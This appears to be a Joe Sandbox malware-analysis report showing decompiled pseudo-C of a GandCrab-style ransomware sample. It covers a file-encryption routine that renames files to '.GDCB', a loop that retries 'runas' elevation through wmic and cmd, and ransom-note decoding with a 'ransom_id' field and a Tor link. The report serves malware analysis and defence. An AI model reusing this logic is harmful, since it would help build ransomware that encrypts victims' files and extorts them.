                                          • Part of subcall function 0F9D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F9D459F
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F9D45B5
                                        • lstrcatW.KERNEL32(00000000,0063005C), ref: 0F9D45BD
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F9D45D3
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D45E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                        • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                        • API String ID: 2684037697-4098772853
                                        • Opcode ID: 21fdc465e9e5f65918be6536aef2ec2d5b2fa9e5921b005dbfdf09191aef98d1
                                        • Instruction ID: 3d037ce479e92392a6ff62be71b1d1a21a9f280bc8e3ba4ad5c125b82955ba1c
                                        • Opcode Fuzzy Hash: 21fdc465e9e5f65918be6536aef2ec2d5b2fa9e5921b005dbfdf09191aef98d1
                                        • Instruction Fuzzy Hash: EE4128B0149380DEE3208F119849B5BBFE6BB81B49F10491CF6985A292C7F6858CCF97
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3BE0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109memorysynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D3BE0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0F9D3B20(__edx);
				if(_t54 != 0) {
					_t54 = E0F9D3AA0();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}















































                                        0x0f9d3bef
                                        0x0f9d3bf1
                                        0x0f9d3bf8
                                        0x0f9d3bfe
                                        0x0f9d3c05
                                        0x0f9d3c17
                                        0x0f9d3c24
                                        0x0f9d3c2d
                                        0x0f9d3c35
                                        0x0f9d3c3d
                                        0x0f9d3c45
                                        0x0f9d3c4d
                                        0x0f9d3c55
                                        0x0f9d3c5d
                                        0x0f9d3c65
                                        0x0f9d3c6d
                                        0x0f9d3c75
                                        0x0f9d3c7d
                                        0x0f9d3c85
                                        0x0f9d3c8d
                                        0x0f9d3c98
                                        0x0f9d3ca8
                                        0x0f9d3cb1
                                        0x0f9d3cb9
                                        0x0f9d3cc1
                                        0x0f9d3cc9
                                        0x0f9d3cd1
                                        0x0f9d3cd9
                                        0x0f9d3ce1
                                        0x0f9d3ce9
                                        0x0f9d3cf4
                                        0x0f9d3cff
                                        0x0f9d3d0a
                                        0x0f9d3d15
                                        0x0f9d3d20
                                        0x0f9d3d2b
                                        0x0f9d3d36
                                        0x0f9d3d41
                                        0x0f9d3d4c
                                        0x0f9d3d57
                                        0x0f9d3d71
                                        0x0f9d3d73
                                        0x0f9d3d79
                                        0x0f9d3d80
                                        0x0f9d3d8c
                                        0x0f9d3d8e
                                        0x0f9d3d95
                                        0x0f9d3d9d
                                        0x0f9d3da5
                                        0x0f9d3dad
                                        0x0f9d3db7
                                        0x0f9d3dc1
                                        0x0f9d3dc4
                                        0x0f9d3dcb
                                        0x0f9d3dd2
                                        0x0f9d3de0
                                        0x0f9d3de1
                                        0x0f9d3de5
                                        0x00000000
                                        0x00000000
                                        0x0f9d3de7
                                        0x0f9d3deb
                                        0x00000000
                                        0x00000000
                                        0x0f9d3df4
                                        0x00000000
                                        0x0f9d3df4
                                        0x0f9d3e06
                                        0x0f9d3e0f
                                        0x0f9d3e17
                                        0x0f9d3e17
                                        0x0f9d3c05
                                        0x0f9d3dfa
                                        0x0f9d3e00

                                        APIs
                                          • Part of subcall function 0F9D3B20: _memset.LIBCMT ref: 0F9D3B72
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                          • Part of subcall function 0F9D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                          • Part of subcall function 0F9D3AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F9D3AD0
                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F9D3C8D
                                        • wsprintfW.USER32 ref: 0F9D3D57
                                        • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F9D3D6B
                                        • GetForegroundWindow.USER32 ref: 0F9D3D80
                                        • ShellExecuteExW.SHELL32(00000000), ref: 0F9D3DE1
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D3DF4
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F9D3E06
                                        • CloseHandle.KERNEL32(?), ref: 0F9D3E0F
                                        • ExitProcess.KERNEL32 ref: 0F9D3E17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                        • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                        • API String ID: 561366689-3790645798
                                        • Opcode ID: d8e225287907bf6ae8012f636f202ae0bb6613253845a7b9d040c87cb1b71f12
                                        • Instruction ID: 1b1e8f97a290841dd6f123cdafe7add18df6feed863d5dc5ad129d7878d62b33
                                        • Opcode Fuzzy Hash: d8e225287907bf6ae8012f636f202ae0bb6613253845a7b9d040c87cb1b71f12
                                        • Instruction Fuzzy Hash: DB516CB0008341DFE3208F51D448B5ABFF9FF84759F104A1DE59886292C7FA91A8CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D35E0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320memorystringwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 78%
                                        			E0F9D35E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0F9D63D0(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v56 = _t162;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xf9e04b0]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xf9e04b0]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xf9e04b0]");
				asm("movdqu [ebp-0x64], xmm0");
				E0F9D82A0( &_v104, 0x10);
				E0F9D82A0( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0F9D6530(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0F9D6530(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0F9D83C0( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0F9D89C0(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0F9D3500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}


















































                                        0x0f9d35eb
                                        0x0f9d35ed
                                        0x0f9d35f1
                                        0x0f9d35ff
                                        0x0f9d3608
                                        0x0f9d3613
                                        0x0f9d361f
                                        0x0f9d3621
                                        0x0f9d363c
                                        0x0f9d363e
                                        0x0f9d3647
                                        0x0f9d364a
                                        0x0f9d3651
                                        0x0f9d3658
                                        0x0f9d3663
                                        0x0f9d3669
                                        0x0f9d3676
                                        0x0f9d367e
                                        0x0f9d367f
                                        0x0f9d368a
                                        0x0f9d368f
                                        0x0f9d3693
                                        0x0f9d369b
                                        0x0f9d36a0
                                        0x0f9d36b0
                                        0x0f9d36c6
                                        0x0f9d36c8
                                        0x0f9d36de
                                        0x0f9d36e4
                                        0x0f9d36e9
                                        0x0f9d36ec
                                        0x0f9d36f1
                                        0x0f9d36f3
                                        0x0f9d36f8
                                        0x0f9d3703
                                        0x0f9d3706
                                        0x0f9d370a
                                        0x0f9d3711
                                        0x0f9d371f
                                        0x0f9d3724
                                        0x0f9d3729
                                        0x0f9d3767
                                        0x0f9d376c
                                        0x0f9d3771
                                        0x0f9d37a0
                                        0x0f9d37a5
                                        0x0f9d37c3
                                        0x0f9d37c5
                                        0x0f9d37cb
                                        0x0f9d380b
                                        0x0f9d3819
                                        0x0f9d381f
                                        0x0f9d3826
                                        0x0f9d3828
                                        0x0f9d382a
                                        0x0f9d382d
                                        0x0f9d3835
                                        0x0f9d3850
                                        0x0f9d3855
                                        0x0f9d385b
                                        0x0f9d3867
                                        0x0f9d386a
                                        0x0f9d386d
                                        0x0f9d386f
                                        0x0f9d3872
                                        0x0f9d3875
                                        0x0f9d387a
                                        0x0f9d3880
                                        0x0f9d3880
                                        0x0f9d3881
                                        0x0f9d3885
                                        0x0f9d3885
                                        0x0f9d389b
                                        0x0f9d38a2
                                        0x0f9d38a7
                                        0x0f9d38aa
                                        0x0f9d38ad
                                        0x0f9d38c2
                                        0x0f9d38da
                                        0x0f9d38df
                                        0x0f9d38e2
                                        0x0f9d38e2
                                        0x0f9d38ef
                                        0x0f9d3902
                                        0x0f9d391d
                                        0x0f9d391f
                                        0x0f9d3924
                                        0x0f9d3924
                                        0x0f9d392f
                                        0x0f9d3935
                                        0x0f9d393a
                                        0x0f9d3832
                                        0x00000000
                                        0x0f9d3832
                                        0x0f9d393a
                                        0x00000000
                                        0x0f9d3855
                                        0x0f9d3950
                                        0x0f9d3956
                                        0x0f9d3967
                                        0x0f9d397c
                                        0x0f9d398c
                                        0x0f9d398c
                                        0x0f9d3993
                                        0x0f9d39a6
                                        0x0f9d39a9
                                        0x0f9d39b5
                                        0x0f9d39c1
                                        0x0f9d39c7
                                        0x0f9d39cf
                                        0x0f9d39cf
                                        0x0f9d39d5
                                        0x0f9d37cd
                                        0x0f9d37db
                                        0x0f9d37e7
                                        0x0f9d37e9
                                        0x0f9d37ec
                                        0x0f9d37f4
                                        0x0f9d37f4
                                        0x0f9d3773
                                        0x0f9d3773
                                        0x0f9d377f
                                        0x0f9d3782
                                        0x0f9d378a
                                        0x0f9d378a
                                        0x0f9d372b
                                        0x0f9d3738
                                        0x0f9d3744
                                        0x0f9d3747
                                        0x0f9d374f
                                        0x0f9d374f
                                        0x0f9d39e2
                                        0x0f9d39ee

                                        APIs
                                        • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F9D35F4
                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F9D35FF
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F9D363A
                                        • lstrcpyW.KERNEL32 ref: 0F9D3658
                                        • lstrcatW.KERNEL32(00000000,0047002E), ref: 0F9D3663
                                          • Part of subcall function 0F9D82A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D82C0
                                          • Part of subcall function 0F9D82A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F9D82E8
                                          • Part of subcall function 0F9D82A0: GetModuleHandleA.KERNEL32(?), ref: 0F9D833D
                                          • Part of subcall function 0F9D82A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D834B
                                          • Part of subcall function 0F9D82A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D835A
                                          • Part of subcall function 0F9D82A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D837E
                                          • Part of subcall function 0F9D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D838C
                                          • Part of subcall function 0F9D82A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83A0
                                          • Part of subcall function 0F9D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83AE
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F9D36C6
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F9D36F1
                                          • Part of subcall function 0F9D6530: EnterCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000,00000000,?,00000800), ref: 0F9D653B
                                          • Part of subcall function 0F9D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D655E
                                          • Part of subcall function 0F9D6530: GetLastError.KERNEL32(?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6568
                                          • Part of subcall function 0F9D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6584
                                        • MessageBoxA.USER32 ref: 0F9D3738
                                        • GetLastError.KERNEL32 ref: 0F9D3773
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D39E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
                                        • String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
                                        • API String ID: 1177701972-69869980
                                        • Opcode ID: 9abc1fbbf9b03e4d9563de6e938be6aa7115963f5177201fac3159c19bded5ad
                                        • Instruction ID: 737e6f7a10b0b45555cb555ef9b09ef4ccc2331dd80173a5a9ed17db930fa17b
                                        • Opcode Fuzzy Hash: 9abc1fbbf9b03e4d9563de6e938be6aa7115963f5177201fac3159c19bded5ad
                                        • Instruction Fuzzy Hash: F2C18E71E40318BBEB218B90DC46FEEBBB8BF48711F208115F640BA1C2DBB869548B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D40E0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175stringmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 363 f9d40e0-f9d40f5 364 f9d43c8-f9d43cd 363->364 365 f9d40fb-f9d4160 call f9d39f0 call f9d7330 call f9d7140 VirtualAlloc 363->365 372 f9d4171 365->372 373 f9d4162-f9d416b 365->373 375 f9d4173-f9d41ba call f9d6f40 call f9d8090 lstrlenW 372->375 373->372 374 f9d416d-f9d416f 373->374 374->375 380 f9d41c0-f9d41d2 375->380 380->380 381 f9d41d4 380->381 382 f9d41e0-f9d41ed 381->382 382->382 383 f9d41ef-f9d420c call f9d8090 382->383 386 f9d420e 383->386 387 f9d4286-f9d4375 383->387 390 f9d4210-f9d4236 lstrcpyW lstrlenW 386->390 388 f9d43a8-f9d43c3 VirtualFree call f9d7c10 387->388 389 f9d4377-f9d4392 VirtualAlloc 387->389 388->364 389->388 391 f9d4394-f9d43a5 wsprintfW 389->391 390->387 393 f9d4238-f9d423d 390->393 391->388 394 f9d4243-f9d424b 393->394 395 f9d424d 394->395 396 f9d4277-f9d4284 394->396 397 f9d4250-f9d4256 395->397 396->387 396->394 398 f9d425c-f9d4262 397->398 399 f9d43ce-f9d43d5 397->399 400 f9d426d-f9d4271 398->400 401 f9d4264-f9d426b 398->401 399->390 400->396 400->399 401->397 401->400
                                        C-Code - Quality: 49%
                                        			E0F9D40E0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xf9e2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0F9D39F0( &_v148);
				E0F9D7330( &_v236, __edx);
				_t97 = E0F9D7140( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0F9D6F40( &_v152, _t98);
				_t60 = E0F9D8090(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xf9e04a0]");
				_t77 = 0xf9e2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xf9e2000) =  *(_t62 + 0xf9e2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xf9e2a64 = 0xf9e2000;
				_t94 = E0F9D8090(0xf9e2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xf9e2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0xf9e2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000);
					_t54 = E0F9D7C10( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xf9e2000;
					_t69 =  *0xf9e2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
